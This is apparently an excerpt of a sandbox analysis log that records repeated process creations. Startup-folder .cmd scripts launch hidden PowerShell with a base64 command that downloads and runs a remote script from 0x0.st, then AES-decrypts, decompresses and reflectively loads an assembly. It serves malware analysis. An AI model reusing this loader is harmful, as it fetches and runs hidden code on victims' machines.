kNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2513bab9.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2c46f0ee.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b6e52985.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cad7c66e.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ff75f7e1.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FC